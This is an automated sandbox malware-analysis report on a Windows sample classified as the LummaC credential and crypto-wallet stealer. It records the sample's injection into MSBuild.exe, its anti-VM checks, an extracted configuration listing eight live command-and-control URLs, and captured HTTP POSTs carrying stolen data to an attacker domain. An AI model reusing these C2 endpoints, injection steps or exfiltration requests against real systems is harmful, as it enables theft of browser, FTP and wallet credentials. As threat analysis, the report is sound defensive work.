Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exe
Analysis ID:1640351
MD5:b18d980cfdce9f0758cdc8db9e7f6bf4
SHA1:5afe3fc037fcd313d26f01b2dfc0b00300ffb047
SHA256:3ee484b7245b7f30f8301359e525b219d8343cbbd407b266db4429b676f1653a
Tags:exeuser-SecuriteInfoCom
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exe (PID: 7836 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exe" MD5: B18D980CFDCE9F0758CDC8DB9E7F6BF4)
    • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • MSBuild.exe (PID: 7892 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
{"C2 url": ["rugbybrign.life/gKAozj", "caliberc.today/KowpqlL", "pistolpra.bet/dABYyaz", "weaponwo.life/NghsayA", "armamenti.world/dsIOQn", "selfdefens.bet/dASBUz", "targett.top/dsANGt", "armoryarch.shop/GiqwY"], "Build id": "ec7bcfffdb54957750b0c5a151d2a749a011650e4d2dd6aa0ea4c9ac"}
SourceRuleDescriptionAuthorStrings
00000002.00000002.2421617824.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    2.2.MSBuild.exe.400000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
      2.2.MSBuild.exe.400000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security

        System Summary

        barindex
        Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 149.154.167.99, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7892, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49711
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-03-17T08:20:11.062614+010020283713Unknown Traffic192.168.2.449711149.154.167.99443TCP
        2025-03-17T08:20:11.950375+010020283713Unknown Traffic192.168.2.449712104.21.32.1443TCP
        2025-03-17T08:20:13.153460+010020283713Unknown Traffic192.168.2.449713104.21.32.1443TCP
        2025-03-17T08:20:14.178888+010020283713Unknown Traffic192.168.2.449714104.21.32.1443TCP
        2025-03-17T08:20:15.203038+010020283713Unknown Traffic192.168.2.449717104.21.32.1443TCP
        2025-03-17T08:20:16.457199+010020283713Unknown Traffic192.168.2.449718104.21.32.1443TCP
        2025-03-17T08:20:17.617692+010020283713Unknown Traffic192.168.2.449720104.21.32.1443TCP
        2025-03-17T08:20:19.605021+010020283713Unknown Traffic192.168.2.449722104.21.32.1443TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: armamenti.world/dsIOQnAvira URL Cloud: Label: malware
        Source: rugbybrign.life/gKAozjAvira URL Cloud: Label: malware
        Source: https://rugbybrign.life/gKAozjCAvira URL Cloud: Label: malware
        Source: targett.top/dsANGtAvira URL Cloud: Label: malware
        Source: https://rugbybrign.life/Avira URL Cloud: Label: malware
        Source: armoryarch.shop/GiqwYAvira URL Cloud: Label: malware
        Source: pistolpra.bet/dABYyazAvira URL Cloud: Label: malware
        Source: https://rugbybrign.life/gKAozjAvira URL Cloud: Label: malware
        Source: selfdefens.bet/dASBUzAvira URL Cloud: Label: malware
        Source: weaponwo.life/NghsayAAvira URL Cloud: Label: malware
        Source: https://rugbybrign.life/gKAozj1.1Avira URL Cloud: Label: malware
        Source: caliberc.today/KowpqlLAvira URL Cloud: Label: malware
        Source: 2.2.MSBuild.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["rugbybrign.life/gKAozj", "caliberc.today/KowpqlL", "pistolpra.bet/dABYyaz", "weaponwo.life/NghsayA", "armamenti.world/dsIOQn", "selfdefens.bet/dASBUz", "targett.top/dsANGt", "armoryarch.shop/GiqwY"], "Build id": "ec7bcfffdb54957750b0c5a151d2a749a011650e4d2dd6aa0ea4c9ac"}
        Source: SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeVirustotal: Detection: 52%Perma Link
        Source: SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeReversingLabs: Detection: 55%
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: 2.2.MSBuild.exe.400000.0.raw.unpackString decryptor: rugbybrign.life/gKAozj
        Source: 2.2.MSBuild.exe.400000.0.raw.unpackString decryptor: caliberc.today/KowpqlL
        Source: 2.2.MSBuild.exe.400000.0.raw.unpackString decryptor: pistolpra.bet/dABYyaz
        Source: 2.2.MSBuild.exe.400000.0.raw.unpackString decryptor: weaponwo.life/NghsayA
        Source: 2.2.MSBuild.exe.400000.0.raw.unpackString decryptor: armamenti.world/dsIOQn
        Source: 2.2.MSBuild.exe.400000.0.raw.unpackString decryptor: selfdefens.bet/dASBUz
        Source: 2.2.MSBuild.exe.400000.0.raw.unpackString decryptor: targett.top/dsANGt
        Source: 2.2.MSBuild.exe.400000.0.raw.unpackString decryptor: armoryarch.shop/GiqwY
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0041C378 CryptUnprotectData,CryptUnprotectData,2_2_0041C378
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0041B570 CryptUnprotectData,2_2_0041B570
        Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49711 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49712 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49713 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49714 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49717 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49718 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49720 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49722 version: TLS 1.2
        Source: SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748B011D4 FindFirstFileExW,0_2_00007FF748B011D4
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748B01358 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF748B01358
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+000001E8h]2_2_00412042
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx]2_2_0044D090
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-0CA48CCCh]2_2_0042E9A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [ecx], dx2_2_004119BB
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+0Ch]2_2_00420A00
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-77E6050Eh]2_2_00420A00
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov edx, ecx2_2_0044CAF0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [esi], cl2_2_00435B69
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [esi], al2_2_00435B69
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+2BB14466h]2_2_00435B69
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-77E6040Ah]2_2_0041B570
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+72h]2_2_0041B570
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-6D882F28h]2_2_0041B570
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then inc ebx2_2_00401040
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [ecx], al2_2_00411040
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [eax], dx2_2_0041A870
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [esp+08h], eax2_2_0041A870
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], C0F3A0E1h2_2_0041A870
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h2_2_0043282C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h2_2_004328C8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [ebp+00h], cx2_2_004288D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+74h]2_2_0042C0D1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov eax, ebx2_2_00431160
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_00440900
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [esi], cl2_2_00436917
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp word ptr [edi+ecx+02h], 0000h2_2_0040EA7C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov ecx, ebx2_2_0040C200
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov ebx, eax2_2_00408A10
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-0CA48CCCh]2_2_0042E2C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [ecx], al2_2_004372F5
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]2_2_0040A350
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]2_2_0040A350
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 61A44046h2_2_0041CB18
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-77E6053Ah]2_2_00448320
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movsx edx, byte ptr [ebp+ebx+00h]2_2_0044AB23
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx]2_2_0044B330
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp ecx2_2_0044B330
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [edx], al2_2_004383C6
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0040C3D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx]2_2_0044B3D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp ecx2_2_0044B3D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax]2_2_00428380
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx esi, word ptr [ecx]2_2_0041A390
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [ecx], al2_2_00438452
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-612193E0h]2_2_00431460
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx]2_2_0044B460
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp ecx2_2_0044B460
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+14h]2_2_0040D4C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax]2_2_0044D4E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_00432CF0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov esi, ecx2_2_00430522
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+6851E954h]2_2_00427DC0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov edi, esi2_2_00427DC0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-58962266h]2_2_0042EDF0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax-77E6053Ah]2_2_00445580
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax+000002B0h]2_2_0041F642
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 1ED597A4h2_2_00447E40
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [ebx], cl2_2_00434E68
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [edx], al2_2_00437E14
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [eax], dx2_2_0041EEE2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+04h]2_2_0044A6F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov eax, ebx2_2_00430E89
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-0CA48CCCh]2_2_0042DF70
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+4EC5F092h]2_2_0042BF00
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [eax], dx2_2_0041D01D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+481F046Fh]2_2_00423F10
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov esi, ecx2_2_00430724
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-22399302h]2_2_0040C730
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]2_2_0041A7B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 7A542AABh2_2_0044C7B0

        Networking

        barindex
        Source: Malware configuration extractorURLs: rugbybrign.life/gKAozj
        Source: Malware configuration extractorURLs: caliberc.today/KowpqlL
        Source: Malware configuration extractorURLs: pistolpra.bet/dABYyaz
        Source: Malware configuration extractorURLs: weaponwo.life/NghsayA
        Source: Malware configuration extractorURLs: armamenti.world/dsIOQn
        Source: Malware configuration extractorURLs: selfdefens.bet/dASBUz
        Source: Malware configuration extractorURLs: targett.top/dsANGt
        Source: Malware configuration extractorURLs: armoryarch.shop/GiqwY
        Source: global trafficHTTP traffic detected: GET /kz_prokla2 HTTP/1.1Connection: Keep-AliveHost: t.me
        Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
        Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
        Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
        Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49713 -> 104.21.32.1:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49717 -> 104.21.32.1:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49722 -> 104.21.32.1:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49718 -> 104.21.32.1:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49711 -> 149.154.167.99:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49714 -> 104.21.32.1:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49720 -> 104.21.32.1:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49712 -> 104.21.32.1:443
        Source: global trafficHTTP traffic detected: POST /gKAozj HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 65Host: rugbybrign.life
        Source: global trafficHTTP traffic detected: POST /gKAozj HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=foOk5zS2H2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19595Host: rugbybrign.life
        Source: global trafficHTTP traffic detected: POST /gKAozj HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=wD1czjs8ALdUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8757Host: rugbybrign.life
        Source: global trafficHTTP traffic detected: POST /gKAozj HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=55KO06ke0lhRlxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20425Host: rugbybrign.life
        Source: global trafficHTTP traffic detected: POST /gKAozj HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PuV80Y51a299gTs0NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2685Host: rugbybrign.life
        Source: global trafficHTTP traffic detected: POST /gKAozj HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DA2DGBhVFVDHcUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 567561Host: rugbybrign.life
        Source: global trafficHTTP traffic detected: POST /gKAozj HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 103Host: rugbybrign.life
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
        Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
        Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
        Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
        Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
        Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
        Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
        Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.19
        Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /kz_prokla2 HTTP/1.1Connection: Keep-AliveHost: t.me
        Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
        Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
        Source: global trafficDNS traffic detected: DNS query: t.me
        Source: global trafficDNS traffic detected: DNS query: rugbybrign.life
        Source: global trafficDNS traffic detected: DNS query: c.pki.goog
        Source: unknownHTTP traffic detected: POST /gKAozj HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 65Host: rugbybrign.life
        Source: MSBuild.exe, 00000002.00000002.2422497815.0000000000F32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rugbybrign.life/
        Source: MSBuild.exe, 00000002.00000002.2422631419.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2422497815.0000000000F32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rugbybrign.life/gKAozj
        Source: MSBuild.exe, 00000002.00000002.2422063672.0000000000EBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rugbybrign.life/gKAozj1.1
        Source: MSBuild.exe, 00000002.00000002.2422292826.0000000000ED7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rugbybrign.life/gKAozjC
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
        Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
        Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
        Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
